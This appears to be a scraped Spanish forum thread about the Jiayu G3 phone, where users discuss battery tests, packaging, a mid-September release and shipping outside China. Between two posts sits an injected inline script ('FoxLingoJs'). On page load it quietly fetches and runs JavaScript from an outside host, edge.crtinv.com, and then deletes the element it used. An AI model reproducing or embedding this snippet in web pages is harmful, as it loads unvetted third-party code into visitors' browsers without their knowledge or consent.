Jiayu G3

Los veo dia y noche fabricando moviles, creo que les hace una ilision tremenda:want:facturacion Facturacion....dollars dollars:blush:
 
Después de leer la prueba de la batería parece que no esté mal del todo. Según la prueba, reproduciendo videos gasta un 11% de batería en una hora. Tengo un Galaxy S y la batería solo aguanta de 4 a 5 horas con la pantalla encendida siendo de 1500 mah y 4 pulgadas. Vamos, que me creo que los 2750 mah son "bastante" reales, quizás de 2200 mah para arriba.
 
Gracias, primaelparo. Entiendo que lo de la "alternativa lonchera embalaje" (la "fiambrera", vamos), ha sido un embalaje eventual para hacer el envío a los tester. Por lo que veo en este reportaje, es más de estética exterior-interior que otra cosa. Son noticias buenas el que no hayan encontrado ningún "pero" y las fotos se ven muy bien. El color gris seguro que irá ganado puntos, a pesar de que cuando comenzó todo esto parecía azulado. Un saludo y buen trabajo.

EDITO: joder!, son 6 (seis) páginas y yo me he quedado en la primera. Y mira que lo has dicho, @primaelparo. Nada, lo dicho: Good job!.
 
Última edición por un moderador:
El 15 parece ser la fecha correcta para que este pepino esté disponible, otra cosa es que esté disponible solo en China y las tiendas como Pandawill o cualquier otra nos lo venda para Europa y/o América... no estaría de más ver otras opciones de móviles disponibles porque puede que no lo tengamos hasta finales de octubre o después :(

buffff, pues yo el 13 de octubre me tengo que coger un avión y me voy de España, y no vuelvo hasta navidades. El 12 es festivo, así que me tendría que llegar el 11 de octubre... siendo optimistas y calculando que tarde en llegar unos 10 días... y a principios de octubre creo que es festivo para ellos... vamos, que como en la última semana de septiembre no hayamos podido hacer la compra, uno que se queda sin teléfono :bouaaaaah:.
<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>
 
Está claro que el 15 de Septiembre es la fecha clave. El pensar que será antes, no sirve de nada. En ansia y el cansinismo no es bueeeeeno. Unas tilitas y a disfrutar de esos reportajes tan "sui generis" que están subiendo desde la China. Au!.

EDITO: Y hay que tener también claro, que a quien se va a servir primero va a ser al mercado chino (que no son pocos).
:bouaaaaah:. Me da la risa. ¿Por qué se va ha surtir primero el mercado chino?
El chinito puede pagar 100€ por el telefono y nosotros 120€. Oferta y demanda. Los chinos venden a su madre por este margen de beneficio.
 
tunhito: Ójala tengas razón. Porque si no, será a mí a quien le dará la risa, recordando tu post cuando vea decenas de chinos subiendo reviews del G3 por youtube y aquí todavía no haya llegado (y no me refiero a los testers).:redbullsmiley:
 
Última edición:

Del blog

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba